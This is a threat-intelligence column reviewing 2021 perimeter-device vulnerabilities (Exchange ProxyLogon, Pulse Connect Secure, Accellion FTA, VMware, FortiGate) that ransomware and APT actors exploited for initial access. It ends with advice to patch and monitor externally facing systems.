Initial access vectors are the methods threat actors use to first gain access to an organization’s systems. They can include exploitation of vulnerabilities, stolen credentials, phishing, or brute-forcing services like RDP or SSH. Many of these accesses can be purchased from threat actors who specialize in obtaining initial access, known as Initial Access Brokers.
The focus for this column will be on vulnerabilities that allow a threat actor to establish a beachhead into the network. While these vulnerabilities were CISA’s Top Routinely Exploited Vulnerabilities from last year, they provide insight into the types of devices and applications ransomware threat actors have targeted and will continue to exploit in the future, and the tools, tactics, and procedures (TTPs) they use.
At a very high level, a vulnerability is a weakness in a piece of software that could, in theory, be taken advantage of to accomplish something unintended by the developers of the software. A vulnerability on its own is not useful to a threat actor; the vulnerability must be exploitable, the threat actor must have a way to exploit it and it must perform the desired action.
Vulnerabilities are exploitable when a threat actor can directly take advantage of them to accomplish a specific goal, such as escalating privileges, gaining remote code execution, exposing sensitive data, or leaking system configurations.
According to CISA, in 2021, vulnerabilities for perimeter-type devices were popular for threat actors to target; they identified vulnerabilities for five appliances for which CVEs were known to be exploited in addition to those previously identified for 2020. These sets of vulnerabilities provide examples of the variety of devices ransomware and advanced persistent threat (APT) actors can exploit and the types of capabilities they allow them.
According to Microsoft, DearCry ransomware was used on compromised on-premises Microsoft Exchange servers in 2021 after exploiting a series of four vulnerabilities known as ProxyLogon. One of the Microsoft Exchange vulnerabilities, specifically CVE-2021-26855, was noted by CISA as a way for an unauthenticated attacker to authenticate as the Exchange Server by sending arbitrary HTTP requests.
Once a threat actor has authenticated to the Exchange server, it is possible to gain access to the Active Directory (AD) environment. From there, the threat actor can use a tool like BloodHound to enumerate the AD environment, then visualize a route to elevated privileges. The three remaining vulnerabilities were remote code execution vulnerabilities for Exchange (CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065), and could also be used to further enable a ransomware threat actor’s malicious goals.
Pulse Connect Secure is used to enable VPN access for remote workers and third-party clients. In 2021, CISA observed an undisclosed threat actor using several vulnerabilities to gain initial access to and place webshells on Pulse Connect Secure systems at multiple organizations, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and CVE-2021-22893.
Ransomware threat actors, including REvil, Netwalker and others used these vulnerabilities; while some are used to gain initial access, they can also enable lateral movement or dropping of additional payloads, like ransomware. Webshells, as were used by the threat actor highlighted by CISA, can allow a threat actor to maintain persistent access to an organization.
In early 2021, the compromise of the Accellion File Transfer Appliance (FTA) file sharing service provided initial access to many organizations, allowing threat actors to drop the DEWMODE webshell. The four zero-day vulnerabilities used as part of the Accellion FTA data breach were CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, and CVE-2021-27104, of which the SQL injection (CVE-2021-27101) vulnerability was used for initial access.
However, by breaching just this one appliance, threat actors could gain access to a wide variety of organizations that use it. This incident, like other supply chain attacks, demonstrates the wide-reaching effect of compromising a single tool.
CISA identified the VMware remote code execution vulnerability (CVE-2021-21985) that threat actors associated with Conti used in conjunction with another well-known vulnerability, Log4j (CVE-2021-44228) to gain access to VMware servers. While initial access to the organization itself was gained using RDP, VPN or phishing, gaining access to vCenter allows the threat actor to have a more substantial impact, since many organizations virtualize key aspects of their operational infrastructure.
In May 2021, an FBI Flash report advised defenders of APT threat actors targeting vulnerabilities in Fortinet’s FortiGate firewall appliance, specifically CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591. In this case, after gaining initial access, the threat actor created an additional user account to further allow them to perform malicious activity on the network.
While patches were released for FortiOS that defenders can apply to mitigate these vulnerabilities, when compared with more traditional Windows systems, there is often less emphasis on regular patching. In addition, there are fewer extensive system administration utilities and defenses available.
These five perimeter devices that threat actors targeted in 2021 provide a glimpse into the ways in which vulnerability exploitation can impact organizations. The vulnerabilities highlighted here allowed threat actors to drop ransomware, conduct supply chain attacks, place webshells to enable persistent access, and impact the systems that host organizations’ virtualized infrastructure. So, while exploiting vulnerabilities in externally facing applications and devices may afford opportunities for initial access, they can lead to a wide variety of malicious behavior.
Many of the vulnerabilities featured here were newer, even many zero-days; the other vulnerabilities that CISA recommended patching in their advisory included several older vulnerabilities.
As systems remain unpatched and these vulnerabilities remain effective, it’s very likely threat actors will continue to use them. This highlights the need to ensure that externally-facing systems, such as the ones described above, are patched wherever possible, and that the systems are rigorously monitored.